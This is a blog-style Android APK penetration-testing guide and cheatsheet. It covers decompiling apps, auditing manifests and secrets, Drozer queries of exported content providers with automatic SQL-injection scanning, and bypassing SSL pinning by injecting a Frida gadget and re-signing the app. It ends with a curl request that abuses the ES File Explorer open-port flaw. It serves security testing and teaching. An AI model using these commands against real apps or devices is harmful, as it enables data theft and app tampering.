Android APK Penetration Testing Cheatsheet & Guide
2025-01-25 13:12 Author: www.hackingdream.net

Explore a step-by-step guide to Android APK penetration testing! This blog covers essential techniques such as decompiling APKs, analyzing AndroidManifest.xml, detecting exported activities, bypassing SSL pinning, and exploiting vulnerabilities using tools like APKTool, JADX, Burp Suite, and Drozer. Whether you're a beginner or an experienced pentester, this guide provides practical tips for uncovering security flaws in Android applications. Dive into the world of mobile app security and enhance your skills in ethical hacking and penetration testing!


Android Penetration Testing Basic Checklist

Step 1: Run the APK in an Emulator

  • Use Android Studio to set up and run the APK in an emulator. Do not run unknown APKs on your personal devices.
  • Understand the behavior of the application. 

Step 2: Decompile the APK

  1. Use the following command with apktool to decode the APK (apktool's decode command is `d`, not `-d`):
    apktool.bat d applicationName.apk
    
  2. Explore the contents, such as the AndroidManifest.xml file and the resources directory.

Step 3: Analyze Decompiled Code with JADX

  • Open the APK using jadx-gui for easy access to decompiled source code.

Step 4: Review the AndroidManifest.xml File

Focus on the following areas:

  1. API Keys: Look for exposed API keys.

  2. Content Providers: Check for exported content providers (exported="true").

  3. SdkVersion: Analyze the minimum and target SDK versions.

  4. Permissions: Ensure no unnecessary permissions are declared.

  5. Activities with exported="true":

    • Test whether such activities can be started using the following command:
      am start packageName/.activityName
      
    • Example:
      am start b3nac.injuredandroid/.b25lActivity
      
    • Verify that no sensitive data is reachable through exported activities.

  6. Backups: Identify whether the app saves backup data at runtime (android:allowBackup defaults to true when the attribute is absent).

  7. Debugging: Check for debug flags or settings.
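The checks in Step 4 can be scripted against the AndroidManifest.xml that apktool produces. The following is an added example, not code from the original cheatsheet: it parses the manifest, applies the platform defaults for exported components (an explicit android:exported wins; otherwise a component with an intent-filter is exported, the rule that applied before targetSdk 31), and reports SDK versions, debug and backup flags, and declared permissions. SAMPLE_MANIFEST and the SENSITIVE_PERMISSIONS list are constructed for the example.

```python
"""Audit an apktool-decoded AndroidManifest.xml for the Step 4 items.

Added example, not from the original cheatsheet. audit_manifest() takes the
manifest text; SAMPLE_MANIFEST below is constructed data so it runs offline.
"""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # prefix of android: attributes

# Permissions worth a second look during review (constructed list, not exhaustive).
SENSITIVE_PERMISSIONS = {
    "android.permission.READ_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.RECORD_AUDIO",
    "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.REQUEST_INSTALL_PACKAGES",
}

# Constructed manifest: debuggable, allowBackup left at its default (true),
# one activity exported via intent-filter, one explicitly, one provider exported.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
    <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="30"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <application android:debuggable="true">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>
        <activity android:name=".SecretActivity" android:exported="true"/>
        <activity android:name=".InternalActivity" android:exported="false"/>
        <service android:name=".SyncService"/>
        <provider android:name=".NotesProvider"
            android:authorities="com.example.notes.provider"
            android:exported="true"/>
    </application>
</manifest>
"""


def _is_exported(component):
    """Explicit android:exported wins; otherwise an intent-filter implies exported
    (the default before targetSdk 31, where the attribute became mandatory)."""
    explicit = component.get(A + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return component.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return a dict of the Step 4 findings for one manifest."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    sdk = root.find("uses-sdk")
    findings = {
        "package": root.get("package"),
        "min_sdk": int(sdk.get(A + "minSdkVersion", "0")) if sdk is not None else None,
        "target_sdk": int(sdk.get(A + "targetSdkVersion", "0")) if sdk is not None else None,
        # debuggable defaults to false when absent.
        "debuggable": app.get(A + "debuggable", "false").lower() == "true",
        # allowBackup defaults to true when absent, which is the usual finding.
        "allow_backup": app.get(A + "allowBackup", "true").lower() == "true",
        "permissions": [p.get(A + "name") for p in root.findall("uses-permission")],
        "exported": [],
    }
    for kind in ("activity", "service", "receiver", "provider"):
        for comp in app.findall(kind):
            if _is_exported(comp):
                findings["exported"].append({
                    "kind": kind,
                    "name": comp.get(A + "name"),
                    # A missing permission means any app on the device can reach it.
                    "permission": comp.get(A + "permission"),
                })
    findings["sensitive_permissions"] = sorted(
        set(findings["permissions"]) & SENSITIVE_PERMISSIONS)
    return findings


if __name__ == "__main__":
    r = audit_manifest(SAMPLE_MANIFEST)
    print(f"{r['package']}: minSdk={r['min_sdk']} targetSdk={r['target_sdk']} "
          f"debuggable={r['debuggable']} allowBackup={r['allow_backup']}")
    for c in r["exported"]:
        print(f"exported {c['kind']}: {c['name']} (permission={c['permission']})")
    print("sensitive permissions:", r["sensitive_permissions"])
```

Run it on a real decode with `audit_manifest(open("appdir/AndroidManifest.xml").read())`; every exported entry with `permission=None` is a candidate for the `am start` check above, and a provider in that list is what Step 5 goes after.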


Step 5: Exploit Exported Content Providers

Use Drozer for further analysis:

  1. Run the following command to find accessible content providers:
    run app.provider.info -a com.app.name
    
  2. Identify content URIs:
    run scanner.provider.finduris -a com.app.name
    
  3. Query the content URI to fetch data:
    run app.provider.query content://com.app.name.provider.notesprovider/notes/
    


Step 6: Review Decompiled Source Code

  • In jadx-gui, navigate to:
    Source Code → com → ApplicationName → MainActivity.
  • Analyze the following:
    • Classes and functions (Example: f.class).
    • Called functions or classes (double-click to follow references).
  • Understand the application's logic and functionality.

Step 7: Check for SSL Pinning

  1. Configure a proxy (e.g., Burp Suite) on the emulator.
  2. Install the Burp certificate on the emulator by downloading it from:
    http://burp
    
  3. Start interception in Burp Suite and observe the traffic:
    • If traffic is visible, SSL Pinning is disabled.
    • If no traffic is seen, you’ll need to bypass SSL Pinning.

Step 8: Bypassing SSL Pinning

Method 1: Using Objection

  1. Patch the APK:
    objection patchapk --source applicationName.apk
    
  2. Install the generated patched.apk on the emulator.
  3. Reload the app; a blank screen may appear.
  4. Start Objection :
    objection explore
    
  5. Disable SSL Pinning:
    android sslpinning disable
    
  6. Verify if traffic is now visible in Burp Suite.

Method 2: Manual Patching with Frida

  • If the above method fails, refer to `Patching Manually using Frida` below. 

Step 9: Perform Manual Penetration Testing

  • Once traffic interception is successful, perform a thorough Web Penetration Test to identify vulnerabilities in the application.

Android Penetration Testing Cheatsheet

Static Analysis

  # Decompile the application
  apktool d application.apk
  # Decompile without resources; use when the app is too large
  apktool d application.apk -r
  # Search for strings in all locations; even the lib directory can contain useful source code or an API key
  # Use strings on .so/ELF files
  # The smali directory contains the source code, but not in a readable format; use a dex-to-jar converter

Locations to check for Secrets

- resources/res/values/strings.xml, xmls.xml, integers.xml, attrs.xml: search for the following strings:
  - firebase_database_url
  - google_api_key
  - google_app_id
  - google_crash_reporting_api_key
  - google_storage_bucket
  - client_id
  - API
  - password
  - AWS
  - Secret
  - http:// or https://
  - .db or .sqlite or SQL
- Or, better, use jadx-gui from https://github.com/skylot/jadx/releases/tag/v1.5.0
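The list above is easy to turn into a scan over the decoded res/values files. This is an added example, not the cheatsheet's own tooling: it walks the entries of one values XML file, flags resource names from the list, names that contain a credential-like hint (api, password, secret, ...), and values that match a URL, an AWS access key ID, a Google API key, or a database file name. SAMPLE_STRINGS_XML is constructed input; the key-shaped values in it are placeholders, and the NAME_HINTS list is deliberately broad, so expect some noise on real apps.

```python
"""Scan an apktool-decoded res/values/*.xml file for secret-looking entries.

Added example, not from the original cheatsheet. scan_values_xml() takes the
file text; SAMPLE_STRINGS_XML is constructed data so it runs offline.
"""
import re
import xml.etree.ElementTree as ET

# Resource names the cheatsheet says to look for.
KNOWN_NAMES = {
    "firebase_database_url", "google_api_key", "google_app_id",
    "google_crash_reporting_api_key", "google_storage_bucket", "client_id",
}
# Substrings in a resource name that usually mark a credential (noisy on purpose).
NAME_HINTS = ("api", "password", "passwd", "aws", "secret", "token", "key")

# Value shapes worth reporting regardless of the resource name.
VALUE_PATTERNS = {
    "url": re.compile(r"https?://\S+", re.I),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "db_file": re.compile(r"\.(db|sqlite|sqlite3)\b", re.I),
}

# Constructed sample; the API key value is a placeholder with the right shape only.
SAMPLE_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Notes</string>
    <string name="firebase_database_url">https://notes-demo.firebaseio.com</string>
    <string name="google_api_key">AIzaSyA0123456789abcdefghijklmnopqrstuv</string>
    <string name="backend_password">hunter2</string>
    <string name="db_name">notes.db</string>
    <string name="welcome">Welcome back</string>
    <integer name="retry_count">3</integer>
</resources>
"""


def scan_values_xml(xml_text):
    """Return a list of {name, value, reasons} for every suspicious entry."""
    findings = []
    root = ET.fromstring(xml_text)
    for item in root:  # <string>, <integer>, <item>, ... are direct children
        name = item.get("name") or ""
        value = (item.text or "").strip()
        if not value:
            continue
        reasons = []
        if name in KNOWN_NAMES:
            reasons.append("known-name")
        elif any(hint in name.lower() for hint in NAME_HINTS):
            reasons.append("name-hint")
        for label, pattern in VALUE_PATTERNS.items():
            if pattern.search(value):
                reasons.append(label)
        if reasons:
            findings.append({"name": name, "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_values_xml(SAMPLE_STRINGS_XML):
        print(f"{f['name']:<25} {', '.join(f['reasons']):<25} {f['value']}")
```

To cover a whole decode, glob `appdir/res/values*/*.xml` and call `scan_values_xml` on each file; the same value patterns also work on the output of `strings` over the .so files mentioned above.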

ADB Commands

ADB Cheatsheet is here

#Port forward a port from the Android device to ADB
sudo ssh -p 22 -L 5555:127.0.0.1:5555 <user>@<device-ip>
#Connect to a device over wireless
adb tcpip 9090
#connect to the service
adb connect 127.0.0.1:5555
#list connected devices
adb devices
#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell
#get a shell
adb shell
#get root privs from a shell
su
#install an apk
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"
#Getting screenshots
adb shell screencap <path to save>
#Recording the screen
adb shell screenrecord <path to save>
#Downloading files
adb pull <source file path> <destination file path>
#Uploading files
adb push <source file path> <destination file path>
#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>
#Getting system information
getprop

Commands inside ADB Shell

#List available packages
pm list packages
#Find a specific package
pm list packages | grep Name
#Find the path of the package
pm path full_packageName
pm path b3nac.injuredandroid
package:/data/app/b3nac.injuredandroid-1/base.apk
#Download the apk back to the host machine: exit out of the adb shell first
exit
adb pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk
#In case you have multiple emulators open
adb -s emulator-5556 pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk
#You can now open the apk for static analysis

Setting up Drozer

#Install drozer via Docker
docker pull withsecurelabs/drozer
#Download the drozer agent and install it on Android
#https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0
#Drag and drop onto the emulator, or install via adb
adb install drozer-agent.apk
#On Windows, set up port forwarding for the emulator
adb forward tcp:31415 tcp:31415
#Get a Docker shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
#Inside the container, start drozer
drozer console connect --server host.docker.internal
#Method II
#Find the IP address under About
#Connect to the Android device using its IP address
docker run --net host -it withsecurelabs/drozer console connect --server 10.10.10.10
#Get a shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
drozer console connect --server <phone IP address>

Drozer Commands

#List all functionality
list
#List packages
run app.package.list
#Filter for a specific app keyword
run app.package.list -f diva
#Basic info
run app.package.info -a jakhar.aseem.diva
#List exported activities, broadcast receivers, content providers and services
run app.package.attacksurface jakhar.aseem.diva
#If the app has an exported activity, get activity info
run app.activity.info -a jakhar.aseem.diva
#View/access the exported activity if Permission: null
run app.activity.start --component jakhar.aseem.diva jakhar.aseem.diva.APICreds2Activity
run app.activity.start --component app.package app.activity.path
#You can also open the exported activity directly from an adb shell (-n takes package/class)
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity
#If the app has content providers, get info on them
run app.provider.info -a jakhar.aseem.diva
#Run the scanner to find provider URIs; take the URIs listed under "For Sure Accessible Content URIs"
run scanner.provider.finduris -a jakhar.aseem.diva
#Query a provider URI
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/
#Look for injection vulnerabilities in an app
run scanner.provider.injection -a jakhar.aseem.diva
#Automatically exploit SQL injection and print tables
run scanner.provider.sqltables -a jakhar.aseem.diva

Installing and Setting up Frida & Objection

python -m pip install setuptools
python -m pip install frida-tools
python -m pip install objection
#Add the build-tools path to the PATH environment variable (update as required)
C:\Users\name\AppData\Local\Android\Sdk\build-tools\34.0.0
#Patch the apk with objection first; if that doesn't work, patch it with Frida manually
#A new apk is generated in the same directory as name.objection.apk
#Drag and drop the new apk into the Android emulator; uninstall the original apk and install the patched one
objection patchapk --source injuredAndroid.apk

Patching Manually using Frida

You can follow this tutorial:

#Decompile without resources; use when the app is too large
apktool d application.apk -r
#Go to the lib directory of the apk and into the architecture that matches the emulator
APK_NAME/lib/x86_64/
#Go to the Frida releases page and download the matching gadget
frida-gadget-16.3.3-android-x86_64.so.xz
#Rename the file to libfrida-gadget.so or frida-gadget.so (based on the library naming convention) and copy it into APK_NAME/lib/x86_64/
#Paste the code below into any smali file you know loads for sure, e.g. MainActivity.smali under /APK_NAME/smali/Company/APK_NAME/ (e.g. injuredAndroid/smali/b3nac/injuredandroid/), and save it.
    const-string v0, "frida-gadget"
    invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V


#Add the Internet permission to the manifest if it's not there already, so that the Frida gadget can open a socket
<uses-permission android:name="android.permission.INTERNET" />
#Rebuild the apk
apktool b injuredAndroid -o inured_patched.apk
apktool b DirectoryPath -o Output.apk
#Sign the apk
keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass password inured_patched.apk mykeyaliasname
jarsigner -verify inured_patched.apk

Installing zipalign

nano /etc/apt/sources.list
#Comment out the Kali apt source and add the line below
deb http://ftp.de.debian.org/debian buster main
sudo apt update
sudo apt install zipalign
zipalign 4 inured_patched.apk inured_final.apk
#Drag and drop the final apk into the emulator and start the app
#Start objection against the running app
objection explore
#Disable ssl pinning
android sslpinning disable
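Seen from the other side, the manual patching procedure above leaves two visible traces in the rebuilt APK: a gadget library under lib/<abi>/ and a fresh v1 (jarsigner) signature in META-INF/. The following added example, not from the original cheatsheet, inspects an APK's zip entries for both, which is a cheap integrity check for an app team or a reviewer who receives a build of unknown provenance. build_sample_apk() constructs a tiny fake APK in memory (stub bytes, not a real app) so the script runs offline; v2/v3 signatures live in the APK Signing Block and do not appear as entries, so "not v1 signed" on its own is not a finding.

```python
"""Inspect an APK for a bundled Frida gadget and v1 (jarsigner) signature files.

Added example, not from the original cheatsheet. inspect_apk() accepts a path,
a file-like object or raw bytes; build_sample_apk() is constructed test data.
"""
import io
import re
import zipfile

# Native libraries are stored as lib/<abi>/<name>.so inside the APK.
LIB_RE = re.compile(r"^lib/(?P<abi>[^/]+)/(?P<lib>[^/]+\.so)$")
# The two gadget file names the manual patching steps use.
GADGET_NAMES = {"libfrida-gadget.so", "frida-gadget.so"}
# v1 signature block files produced by jarsigner; v2/v3 signatures are not zip entries.
V1_SIG_SUFFIXES = (".RSA", ".DSA", ".EC")


def inspect_apk(apk):
    """Return native libs per ABI, instrumentation libs and v1 signature state."""
    if isinstance(apk, (bytes, bytearray)):
        apk = io.BytesIO(apk)
    with zipfile.ZipFile(apk) as z:
        names = z.namelist()
    report = {
        "native_libs": {},           # abi -> list of .so names, in zip order
        "instrumentation_libs": [],  # full entry names that look like a Frida gadget
        "v1_signature_files": [],
        "has_classes_dex": "classes.dex" in names,
    }
    for name in names:
        m = LIB_RE.match(name)
        if m:
            lib = m.group("lib")
            report["native_libs"].setdefault(m.group("abi"), []).append(lib)
            if lib in GADGET_NAMES or "frida" in lib.lower():
                report["instrumentation_libs"].append(name)
        elif name.startswith("META-INF/") and name.upper().endswith(V1_SIG_SUFFIXES):
            report["v1_signature_files"].append(name)
    report["v1_signed"] = bool(report["v1_signature_files"])
    report["suspicious"] = bool(report["instrumentation_libs"])
    return report


def build_sample_apk():
    """Construct a minimal fake APK in memory (stub bytes only, not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")   # binary XML stub
        z.writestr("classes.dex", b"dex\n035\x00")
        z.writestr("lib/x86_64/libnative.so", b"\x7fELF")
        z.writestr("lib/x86_64/libfrida-gadget.so", b"\x7fELF")  # the injected gadget
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr("META-INF/MYKEYALI.SF", "Signature-Version: 1.0\n")
        z.writestr("META-INF/MYKEYALI.RSA", b"\x30\x82")           # PKCS#7 stub
    return buf.getvalue()


if __name__ == "__main__":
    r = inspect_apk(build_sample_apk())
    for abi, libs in r["native_libs"].items():
        print(f"{abi}: {', '.join(libs)}")
    print("instrumentation libs:", r["instrumentation_libs"])
    print("v1 signed:", r["v1_signed"], "| suspicious:", r["suspicious"])
```

On a real file call `inspect_apk("inured_final.apk")`; comparing the signer certificate inside the .RSA entry against the one on the store build is the natural next check, since a repackaged app is necessarily signed with a different key.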

Dynamic Analysis with MobSF

#For Linux, download MobSF and run setup.sh, then run.sh
#For Windows, download Docker from https://docs.docker.com/desktop/install/windows-install/
#Set up MobSF
docker pull opensecurity/mobile-security-framework-mobsf:latest
#Run MobSF
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
#Or add a new environment variable:
#  Variable name: mobsf
#  Variable value: docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
#From now on, type this in cmd to run MobSF on Docker
%mobsf%
#Access the application using the credentials mobsf/mobsf
http://127.0.0.1:8000/login/
#Add the path below to the PATH environment variable
C:\Users\Bhanu\AppData\Local\Android\Sdk\emulator

Port Scan on Android

Since many random ports can be open on Android devices, it is always better to scan all ports. Use RustScan:

https://github.com/RustScan/RustScan/releases
#Download the Debian package
dpkg -i filename
rustscan -a 10.10.10.247

Then scan the open ports with `nmap -sC -sV` to run the default scripts and a version scan.

AWS Enumeration

Use the Cloud Enum tool (cloud_enum), available on GitHub.

Firebase DB Enum

- See if you can find a Firebase URL in the source code; if so, visit it and see what you can find there.
- Dirb it and look for any exposed content.
- Find the DB from the apk using https://github.com/Sambal0x/firebaseEnum
  git clone https://github.com/Sambal0x/firebaseEnum.git
  cd firebaseEnum
  python -m pip install -r requirements.txt
  python3 firebaseEnum.py -k APK_Name

Abusing ES File Explorer Vuln

A public exploit exists for this, or you can use curl to abuse it:
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777

Source: https://www.hackingdream.net/2025/01/android-apk-penetration-testing-cheatsheet-guide.html